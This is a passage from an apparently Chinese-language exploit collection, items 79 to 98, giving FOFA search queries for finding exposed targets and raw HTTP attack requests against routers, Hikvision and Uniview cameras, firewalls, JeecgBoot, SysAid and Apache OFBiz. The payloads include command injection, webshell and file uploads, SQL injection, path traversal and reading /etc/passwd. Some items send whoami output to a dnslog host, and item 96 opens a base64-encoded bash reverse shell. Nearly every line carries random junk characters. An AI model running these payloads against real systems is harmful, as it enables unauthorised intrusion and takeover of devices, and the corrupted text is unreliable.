8 w/ w# c" t5 u# F# F! v( |+ ]
% H% t( N! ^0 w& U! g! L2 E/Applications/SkillDevelopAndEHS/" m8 B. j) ]# b+ R
------YsOxWxSvj1KyZow1PTsh98fdu6l--
' }& y2 z9 _" M& \: }8 F, r7 {7 h# z) W b( ?
# m, [* c- _6 ^# s- t- t! ?5 ^
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.15 [& [ A2 Z& Y* z9 W
Host: x.x.x.x
/ j6 H* e7 g8 e, g8 M
! H& A6 p4 z0 s/ ` y
* W& Y: u% L/ t& Q/ _# D8 `. b79. BYTEVALUE 百为流控路由器远程命令执行
" I- c9 b% t+ ]) f; ZFOFA:BYTEVALUE 智能流控路由器
. J/ }( [/ ?: c8 d0 @. X( wGET /goform/webRead/open/?path=|id HTTP/1.1
0 F" F! A; u" f% oHost:IP
9 x7 @! k# C' m. S& RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
) R- _/ I" U& r# U& sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' a/ L+ r2 J( k: X4 z. b0 E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* H: g6 p+ }( @: C) z& |
Accept-Encoding: gzip, deflate7 M: S+ ~. G5 U" X4 q
Connection: close
. L! v. I' B; K3 `' t, oUpgrade-Insecure-Requests: 1' l% l$ [; o; J) N. w
- ], |: ~) h; Q4 ^: S h; l: p
# J+ y5 V8 o' j2 m: L8 O( e
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
+ |5 ?+ A7 }/ {. iFOFA:app="速达软件-公司产品"! e* U3 @! l- V/ c: H6 [9 C
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.19 y( B6 F4 Z4 H+ [1 F
Host: x.x.x.x
& V, e% @8 }3 e" a# ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 |! ?4 f# Y4 Q
Content-Length: 27: g0 y9 M* Q9 z: l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. C9 `3 Q* S4 q3 D5 X
Accept-Encoding: gzip, deflate' T0 F P" T# Z& @' z% G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 p, V! ]0 G2 ~4 w7 M4 x1 b& ~1 wConnection: close
, j ^" t) E1 _* Y. c" y5 m! |9 {Content-Type: application/octet-stream3 G, a0 ^3 ~* J0 A
Upgrade-Insecure-Requests: 19 Q7 H' N6 E6 B
7 M5 S3 e1 a: n5 s
<% out.print("oessqeonylzaf");%>( b0 U, F- p8 F) ^* F
! y: y% G. z1 n9 ?. T* Y9 S* n* X. i& w! W) w4 z; F4 ]% a- t
GET /xykqmfxpoas.jsp HTTP/1.1
( b# V' H0 b, }( I8 oHost: x.x.x.x- A9 l2 @( @- i& |( L4 @, U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ s9 d* \: D Z- g
Connection: close7 R( V7 v6 W/ \7 \
Accept-Encoding: gzip( W7 t0 W" h4 z7 x4 T0 U! J
" R7 ~- Q) h) U9 i
M# I4 j) S" C: |7 M* A7 Q* t$ z81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露" q& Z* @0 v8 F4 y# D) {
FOFA:app="uniview-视频监控" e1 e& p/ c- x! L4 A! S7 C8 X- o
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
0 D! z$ w- `+ ^" w2 p& W$ OHost: x.x.x.x
3 S- w: H( [/ B* p ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ V# W; _+ z+ sConnection: close0 b5 Y+ y4 i" d5 E( \
Accept-Encoding: gzip1 i9 Z: r0 \. w* m5 S. z1 c
) k. k2 b- H! a' R9 D
4 q x0 p' e$ p/ {9 M a
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
5 [/ x3 U5 j" O& |# b: RFOFA:app="思福迪-LOGBASE": k6 J( F: E. L2 C8 M" Y' Z
POST /bhost/test_qrcode_b HTTP/1.1
9 b0 U# V# G. D# j' d; O% w+ cHost: BaseURL
% |2 }9 N& ~2 _/ O" t4 O* |+ s CUser-Agent: Go-http-client/1.1
2 w, v0 X' q" v( |6 [Content-Length: 23
2 {) y- S, r) E5 j8 NAccept-Encoding: gzip: ^% _0 G- a" V
Connection: close. m& W- i; D+ R" `0 P% Q9 @# g( s
Content-Type: application/x-www-form-urlencoded$ I3 k. V" o& m9 N7 Y
Referer: BaseURL4 c; Z2 x1 ]9 h; O) [3 a
9 Z: U" ]: Q) {3 r# @ Jz1=1&z2="|id;"&z3=bhost8 }; R! w0 W" n7 W/ P
3 r3 g3 c% z4 w2 N0 _0 @3 v/ W/ X8 e* `2 C F( c# ~5 R4 F: w4 L% ]8 m D
83. JeecgBoot testConnection 远程命令执行" j# g& d/ ]& j/ }8 W
FOFA:title=="JeecgBoot 企业级低代码平台": K) M! j6 W# V* ?7 D, e" b( N
0 Y4 z6 k7 f) t5 w
$ b5 _& |3 J5 |0 G4 ?0 m" M7 {
POST /jmreport/testConnection HTTP/1.1/ g+ j4 @! N; [, j
Host: x.x.x.x
' T8 t' R6 |8 O9 `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 B0 |' f8 M- P, l P: TConnection: close3 Z7 E+ I/ g! j& P$ L
Content-Length: 88817 S2 l3 o% @' Z+ u* s8 o! B( w3 x" v
Accept-Encoding: gzip$ m% @/ n; z- T4 r' Y3 l
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"7 j4 F' `9 }$ `& B; ~) f/ b4 t6 _
Content-Type: application/json' y" [9 w4 ?* y/ X
3 s2 G ?5 b. A3 I1 l! F. C* F! APAYLOAD
6 J, z7 ]5 q8 V; X- O3 A, l0 g) o/ I0 q5 ?* v
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
9 @) s0 z2 h2 R5 m2 d3 e" ]FOFA:title=="JeecgBoot 企业级低代码平台"# R$ t) C2 l4 l2 y+ ?" E
( A' g- c1 ^& s6 y7 T: U
& ~$ p$ |3 s, B2 @7 l( h+ g3 e+ x2 i$ L6 A
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
# X2 |; M2 q! d; G( S1 ]Host: 192.168.40.130:8080 u1 o+ [# l5 m& H8 a# s$ s4 B
User-Agent: curl/7.88.1
- l D8 ?& j* TContent-Length: 156. y2 X; P c v( q @4 d
Accept: */*2 i' Q" e# |: `3 p
Connection: close/ @6 F$ u; ~2 C% U
Content-Type: application/json M1 A# j" G: \: W5 [. B3 X
Accept-Encoding: gzip
\" D) e; o1 v7 o$ |! r4 U0 F8 a/ q
{! W" y+ \7 z9 G/ r5 Y" ]9 N; |6 U
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
; g/ { q' l! p$ n "type": "0"; P8 J3 ^; k, K5 t5 ^: L
}
- [/ H* {+ z5 X
4 ^9 m: a: q8 U* p* O ]+ }1 ?& H# o4 a& w
85. SysAid On-premise< 23.3.36远程代码执行
7 A( \( Q$ T7 v! W$ B7 k6 [CVE-2023-47246
7 N" B8 E2 Q5 m( a- n& K& LFOFA:body="sysaid-logo-dark-green.png"
( O) V; A6 z5 e4 jEXP数据包如下,注入哥斯拉马
* e9 g% h8 A% E: X: J5 `3 ePOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1; a$ T y8 d: d6 a2 \* {$ J' _
Host: x.x.x.x
! j7 R* v2 @4 Y7 h0 [( \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" s( r9 D, B7 L1 s/ D7 G) c' y [" S
Content-Type: application/octet-stream
8 ~! G% {* B6 R0 i2 P; _Accept-Encoding: gzip: w6 k( d3 T2 j! H/ w
4 V( D7 X" R$ [PAYLOAD3 E: L; b4 F I+ t' ~7 e) A
' N* i) F. `" Y7 B回显URL:http://x.x.x.x/userfiles/index.jsp
2 \ L! `9 C! e: E+ q2 q# E2 F
7 k5 E8 _! R- G+ i9 R86. 日本tosei自助洗衣机RCE
' z+ q9 s+ w. U: L# i0 PFOFA:body="tosei_login_check.php"2 e( [, h7 P7 C, s# d
POST /cgi-bin/network_test.php HTTP/1.1
" l9 O$ }' w4 i# e9 {% d0 A; xHost: x.x.x.x4 F8 i7 l$ A D5 ?
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
a( T5 r* o5 N: C8 KConnection: close
9 E7 w) y- y, ?% OContent-Length: 447 ~) Q" ~; R |/ _0 a6 S K
Accept: */*% N( x J2 B6 ?; k9 }! N! B
Accept-Encoding: gzip; s* I# k: f& r& y
Accept-Language: en
5 l' R4 u9 T3 h/ k. S6 {# Y8 FContent-Type: application/x-www-form-urlencoded# d1 t" r$ e5 @, ]
+ A6 ?7 A' m/ m6 P% x9 f# Ehost=%0acat${IFS}/etc/passwd%0a&command=ping+ f7 ~! N- {- t/ Y/ P
* h! f/ a6 h; ?( g$ Q
" {( u3 p- { B9 ^; f2 l
87. 安恒明御安全网关aaa_local_web_preview文件上传$ D: a0 `+ ?% P q
FOFA:title="明御安全网关"
w7 N8 K& r; F' f. }/ GPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1& K/ O' T& q1 t' K" z7 D- t) A$ ?6 {0 J
Host: X.X.X.X# D% B; p- k$ ^# ^' ^' U! m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 H. K; z4 C+ \% G
Connection: close4 x X% e- P. X+ @& n$ `- z
Content-Length: 198
/ z+ I' A [6 p r" v* @# g5 xAccept-Encoding: gzip
$ \ @: t3 o' t& kContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd" F/ g1 i/ n, a4 C0 V! n6 p
2 W7 {" G' b' C. N--qqobiandqgawlxodfiisporjwravxtvd
3 }' I; a7 \- z: G, j4 n3 i* LContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
; a1 I" S3 e4 N1 i& u! s/ R0 KContent-Type: text/plain
$ F; z% E8 g5 j: r9 `+ g
) q- s) R0 z1 o. u+ M" [ B& K2ZqGNnsjzzU2GBBPyd8AIA7QlDq% T, `2 f( M9 g6 ^2 ?7 x
--qqobiandqgawlxodfiisporjwravxtvd--
) u' p3 }5 q! }
: G# ~8 d4 \9 @* D
# V0 i" M9 H; J4 ^+ E: c/jfhatuwe.php
* B; J$ j1 E, |2 s$ a8 \0 |7 l) F2 ^0 S
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
0 E: @5 l" r6 s, s/ t6 V0 rFOFA:title="明御安全网关"
2 A3 o0 R, t; }% fGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
+ J( \' l9 M, A8 NHost: x.x.x.xx.x.x.x6 {+ f3 @; I5 A. Z! i( `4 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' ~7 A$ W: \! ]% P' W1 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ D4 ~+ L0 G' u8 F% q. hAccept-Encoding: gzip, deflate
, f1 e: d" g [' M) y! cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 s$ Q0 V4 `# G# s# O! Q) ?# L2 S5 rConnection: close
. ~; Q; g& ^3 J3 O% c; s' U, p" b% V9 Z7 i( Z
( l% l) |9 ~* K% L. ?/ ^/astdfkhl.php
/ ?6 q G' }+ G# `/ ]( A
) n8 k+ W# ?5 [ V) |! c89. 致远互联FE协作办公平台editflow_manager存在sql注入
, T* T) D1 ~0 p# ]) sFOFA:title="FE协作办公平台" || body="li_plugins_download"
5 d- x& h2 m* d( C& [POST /sysform/003/editflow_manager.js%70 HTTP/1.1
. I" o5 w# F( A$ M: e. y8 g. tHost: x.x.x.x! a( G1 P3 `+ K4 V! [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 \& q& Q# z9 A G$ k4 j* ~ PConnection: close" s O* R% k, u. B
Content-Length: 41
. J7 c0 J" L7 x" {9 g8 _/ \Content-Type: application/x-www-form-urlencoded
6 x# v. g0 }) p: m4 iAccept-Encoding: gzip/ c( |- p+ ^% ]( Y6 P
/ W. ]* ?) o# t5 @option=2&GUID=-1'+union+select+111*222--+
2 q3 z$ m: B* [# {5 h9 H5 w$ K1 w4 H! X$ q v( v
7 o4 N p \& G2 Q" l. L90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
# j8 p: `, |9 y7 `. JFOFA:icon_hash="-1830859634"
; o9 [' Q8 L6 c/ ?9 l+ Z; yPOST /php/ping.php HTTP/1.1
4 C B; }1 a8 {4 zHost: x.x.x.x
! _" x. l2 x5 u4 E: HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
! L9 p6 l( f% K0 V' L4 PContent-Length: 51" x0 e0 z& f. k3 S: U, ?5 u) e
Accept: application/json, text/javascript, */*; q=0.01
0 x0 |- ]+ p* i2 IAccept-Encoding: gzip, deflate
! z( G- h; m0 j% oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ E. O5 J! h8 W2 b6 Y! f9 u- ^8 ?Connection: close4 p* L6 y& d' G
Content-Type: application/x-www-form-urlencoded
j* B/ Y/ B! [+ R; Z# tX-Requested-With: XMLHttpRequest
9 N" {5 i6 s" P4 F: ]
* J) l1 O* h2 {$ gjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig: w8 N( k: { m7 L, h: z* a
2 [* @5 F& U. o- z
- L4 I% x' d, o) N91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取3 J, R: x) d, @6 F$ ?
FOFA:title="综合安防管理平台"
* W$ ~! H8 Z7 c: m. q T8 AGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
( i) V. d% J" tHost: your-ip; f0 z4 k* z- c" ]+ ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
% ]& ~4 Y0 ^6 v& yAccept-Encoding: gzip, deflate _; t$ x$ n; u: Z' q, C% a
Accept: */*" Y8 l# ]% `& g. Q4 {9 ^
Connection: keep-alive7 P6 g t, C% L' `0 }2 N1 @6 j
6 k7 V: A& A: _1 G* A* {1 e) J
* `& u6 n: v; d0 `8 Z) _/ S) L
' ]2 M* r1 [/ h* T. g3 b6 D% D92. 海康威视运行管理中心session命令执行) z4 t p2 \- g/ f1 X# d1 r
Fastjson命令执行! d" }5 a' Q! q# {9 M2 W8 ~1 _
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"! J0 w x. y3 V! U) z. N
POST /center/api/session HTTP/1.1
/ y2 \4 S9 r# m8 P ]Host:
, C1 y6 h5 v. w4 P2 H! [2 g# VAccept: application/json, text/plain, */*4 ]- I" Z. [7 ^9 G6 G
Accept-Encoding: gzip, deflate
9 W- ^" `$ d3 d3 I! s QX-Requested-With: XMLHttpRequest9 S* z0 z4 ? e* x; u& W `/ Y% o
Content-Type: application/json;charset=UTF-80 X( w3 o' s% Z/ C) S
X-Language-Type: zh_CN& g& v# I1 B3 h z' T! `; J
Testcmd: echo test
2 b9 ]; K x) xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
$ [) F# s, X4 UAccept-Language: zh-CN,zh;q=0.9 m e7 M+ ^9 `1 C+ H/ R
Content-Length: 5778! o! h1 E& O0 C# Z& g. S/ y0 L) G7 y
0 L0 y8 S8 ]* M6 m: m2 n& P/ C9 ?PAYLOAD
, S' ]! Q, d; y) P1 C% E4 B; n, _: U6 @8 J0 D4 q
' N$ Y& Q0 E) X) `
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
# d& o' W n8 e# ?3 P- C |# O1 [/ mFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="7 [( Q8 S7 D9 U$ W. Z3 Y& G j1 g/ I9 x
POST /?g=app_av_import_save HTTP/1.1' C# G5 I. }* h( t( V
Host: x.x.x.x- |0 {0 t: E# o+ G3 _2 @
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx: g& y8 g6 {2 A( L
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.369 W% i6 Y& N6 ?
0 L5 O( ?. K/ O1 p9 j
------WebKitFormBoundarykcbkgdfx7 v$ ` X: D- p2 p, P3 V* [
Content-Disposition: form-data; name="MAX_FILE_SIZE"- d1 n% i5 `, y, N7 i
R; f. X. `3 V1 f$ O- |6 T
10000000/ F/ r4 h! m/ q& }- s/ b
------WebKitFormBoundarykcbkgdfx) p( K* @9 C" t% _; a P
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt", S9 i- |( Z3 G/ h& S, L+ U8 h
Content-Type: text/plain
, Z- D: z. e2 O3 _5 h3 r7 ?; B* D% U% t+ ]5 s/ X
wagletqrkwrddkthtulxsqrphulnknxa
9 }+ v }3 e Q2 D------WebKitFormBoundarykcbkgdfx
1 G8 a$ I0 Z$ U* K* ZContent-Disposition: form-data; name="submit_post"3 j, C- E- y9 v+ d8 J2 y
$ h: q5 `/ c Z) eobj_app_upfile
t0 C5 d/ S7 F6 `$ o! {8 L; P------WebKitFormBoundarykcbkgdfx4 W, D7 z0 X& p
Content-Disposition: form-data; name="__hash__". N1 ^3 Y' m1 }0 B3 m9 [# H
' P) h$ r, i8 o9 }+ ]7 v7 M0b9d6b1ab7479ab69d9f71b05e0e94455 u1 u: F. Z0 H5 o1 K7 ?2 e2 o: W
------WebKitFormBoundarykcbkgdfx--
1 F' `% `: j3 m5 A! i7 s4 X9 `. h3 v2 }
/ Z3 H( X+ ?' \9 H3 _& e6 q2 N9 S, i9 o5 V+ @) ?1 Q# ~/ h
GET /attachements/xlskxknxa.txt HTTP/1.1
! ~1 k1 M5 r' qHost: xx.xx.xx.xx/ _% z) p2 N$ I |* U! `: J1 \0 j. D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: e2 p1 ^. D' c/ H; F( Z
- q# L. P I0 t* B* E# m
' |7 V2 W, [/ Z8 n) k94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传, N+ k3 S$ B$ R! t7 v7 U
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
7 h: u% @% L: q1 J( tPOST /?g=obj_area_import_save HTTP/1.1
. N7 P# Q, G1 z; \1 C pHost: x.x.x.x @" d% x" S1 B. [# l& {0 t5 ~
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt+ G9 B* T/ r, t- y- ^. W) t4 O" U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
. e/ i7 H3 Q3 c% g2 E2 s: Y
) t$ l6 c" E# q& ^- g------WebKitFormBoundarybqvzqvmt
+ t/ S6 f G+ S4 v3 IContent-Disposition: form-data; name="MAX_FILE_SIZE"/ [5 }" P, h9 X$ e2 H# A
+ i' m+ D) G: s& G# o4 i
10000000
+ X. v& ^" @( [1 G0 L- L$ n3 N------WebKitFormBoundarybqvzqvmt* Z# r. j7 n+ v5 p( J
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"+ [1 u( G' C! n5 _/ A$ `" y
Content-Type: text/plain
9 k' l; V" z" M5 W" U* `: O, Z/ d2 N1 y+ s8 R
pxplitttsrjnyoafavcajwkvhxindhmu2 K! B0 o; n! v* t
------WebKitFormBoundarybqvzqvmt
t0 H: e3 X2 ?, mContent-Disposition: form-data; name="submit_post"" V8 K2 s6 n9 b/ [6 E, D# V
% |9 I, f6 ^% ]( T. ^& a: @5 l) {obj_app_upfile4 J8 I4 d# q0 Z; W5 F3 g9 R
------WebKitFormBoundarybqvzqvmt" C& I: ~# k$ u3 R7 v& U
Content-Disposition: form-data; name="__hash__"
( ~) X9 `5 b. l0 d: \: }0 O% X- }9 l$ s/ A
0b9d6b1ab7479ab69d9f71b05e0e9445( V' U2 Q* n; W4 M! k) D
------WebKitFormBoundarybqvzqvmt--
1 ^; r3 o0 K. N, B" [1 x6 _$ X- H- ?4 l
& t5 R6 S% W$ m1 O7 o& N0 r5 B) W l5 n! V3 ^! R5 n: u
GET /attachements/xlskxknxa.txt HTTP/1.1
& X2 u# N Y6 X+ [; _- P" e; b6 IHost: xx.xx.xx.xx: s% V% Y: U! p8 _5 E3 Z, g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: x8 f0 X: n$ Y" o; {/ w
1 v. s x6 [: O, J6 M- G6 R# z2 D( [, _- |9 W2 x$ D! e
9 D1 Q+ r# L3 Y
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行+ S+ s w- s# i4 v$ E3 X1 ]+ D
CVE-2023-49070
1 f& z1 \3 |, z& K( \2 CFOFA:app="Apache_OFBiz"0 C9 @" M. d V- j; `
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
; ~5 h4 p7 D, c3 B9 ~1 ]Host: x.x.x.x
7 R8 N( q, J% ?User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36- d: I+ M$ D. v8 t% W
Connection: close
5 p/ ?. e2 ]3 ~4 hContent-Length: 889
d% ]- f8 Q, y1 A6 DContent-Type: application/xml
' e) r9 ]* u/ r' z$ AAccept-Encoding: gzip! P' A/ S3 S6 K& N a/ Q
6 l1 N6 b0 D" K3 ]
<?xml version="1.0"?>
7 l4 s ~0 p" C* e, L3 h<methodCall>( Q: V7 X( n; n* u/ \& d
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
) j4 n. T, o: E O& | <params>$ J3 A" {8 ^9 m' r9 J! Z' ~
<param>% h+ {( @% E# s3 @! E. v. M
<value>
$ E2 h0 } l- W4 G& L5 x, C9 o5 ~! u <struct>" b$ u: _7 v' ^* O Y* t1 h
<member>
* p8 H: c6 A0 ]0 c- E <name>test</name>
3 W2 B9 a- n* z& k, ^ C6 u <value>
; z2 E' |2 a( W' y; A, Y7 t <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
/ K+ K/ P! Z, a2 ?; N/ o </value>
1 a$ Q/ d: w4 _0 W( E! C6 { </member>
! k- v5 i& X4 Q. w </struct>" k5 N( ~' w n* {* T! h
</value>% i- H, e! w4 ^
</param>) w5 O8 w/ T# R+ R' @! f
</params>
; p6 u' G# o/ _: }' v</methodCall>
: Z" w- F+ E/ @* E) f% D0 W# I( W9 v, k/ r3 D% X2 Q' A: y! v
' j0 U" D! c N0 U3 U: z用ysoserial生成payload
/ ~& k: v% O( x2 Djava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
! G5 n! X( K# Z( d. ~
9 [- o7 k, u6 _# ]: r; D+ I
" T0 C! P, ? |( b. F将生成的payload替换到上面的POC
1 G3 ?- _/ t+ E' ZPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
8 J( ^& k8 U+ s, c vHost: 192.168.40.130:84433 S$ k% a G+ k0 l! X/ ^- S6 l$ {8 c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
9 u# Z. c0 S) {& TConnection: close' A2 l! X8 r5 w0 L0 `3 ^7 E
Content-Length: 889
1 l: u, A3 Y9 ~Content-Type: application/xml+ r7 A4 A& B# L! B
Accept-Encoding: gzip# d5 N k. L) y0 x9 D1 ]$ j# O
8 J$ q! ?5 m- L- i2 v( F# I
PAYLOAD3 K% R4 `: v7 s$ `
+ o' c: b! O. s# _2 G- c& e96. Apache OFBiz 18.12.11 groovy 远程代码执行; T( ~ f0 C2 d8 Y
FOFA:app="Apache_OFBiz" P: T* q- g+ a/ K0 S% n! h
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
9 I$ i( D! \. T3 N; pHost: localhost:8443$ @' ?! p: d4 e. M' s( s) I& S" d. q+ t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- X8 N9 o+ u5 C0 u/ O9 Q: _+ P
Accept: */*
* u: A# ~+ ^# k$ j/ {8 EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# i; u. ?8 ~9 l4 y- {( U9 K0 {) BContent-Type: application/x-www-form-urlencoded
; F* t) Y+ x! J- [Content-Length: 55
$ q" r, m7 h* a5 r7 m0 i; {% j0 J1 O
groovyProgram=throw+new+Exception('id'.execute().text);
8 y9 J+ b+ p Y9 @& G
7 \4 l1 K" q6 n# z; E' e: j+ W: \( @. @- J2 j; U" l
反弹shell
! m* P7 T: ^7 s在kali上启动一个监听
/ w: M5 w) ~0 Z" X5 T7 g9 g- _nc -lvp 7777
9 X! C( A2 f& n0 P& b, n# }- X& P6 s
- F7 \$ ?* D( W+ Z/ x7 R- z) tPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1$ Q. o9 O8 T2 n0 U
Host: 192.168.40.130:8443) O4 v U0 A5 h) U, C* R" s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 _, {) S' I" c6 F9 R5 e
Accept: */*
( X9 S0 }3 S# i* D, j/ |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 K) M( m% d9 F* y! e rContent-Type: application/x-www-form-urlencoded- e/ {- D+ a7 J: x! d
Content-Length: 71; U7 X9 {8 Q- X
* }& a( v/ U0 q$ ngroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();+ p* u, L0 ~( U4 t1 G
1 |; V# _2 I: ^* u97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行( Z% ^9 u) f- o3 o! i; G
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"; ?3 `" p! G' J. Q( ?7 V
GET /passport/login/ HTTP/1.1
: {4 ]; H6 {1 _) MHost: 192.168.40.130:8085
' P/ n. U% `/ O2 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# b2 n! N! d! t$ i! P+ gAccept-Encoding: gzip
7 ]4 U( \2 O; xConnection: close' H; h" [& S: M0 B& f, _
Cookie: rememberMe=PAYLOAD6 T2 E' j- q8 | O7 q* f
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
; `% c1 L1 V+ B
/ D" \6 u. E7 R' {( ]$ _/ i, c* L
* x6 w: j% `4 c" W( f& L98. SpiderFlow爬虫平台远程命令执行! A/ J% [+ |8 c
CVE-2024-0195
3 b N: B6 Q2 @) e) _, ?FOFA:app="SpiderFlow"
4 B3 ~. B- B, o) J1 ~+ A* [POST /function/save HTTP/1.1- I9 U2 w% @6 W
Host: 192.168.40.130:8088
4 _9 c) P: S; K5 s6 N5 x7 [+ k# SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
7 t, N* H. K& R1 E) n0 ^Connection: close
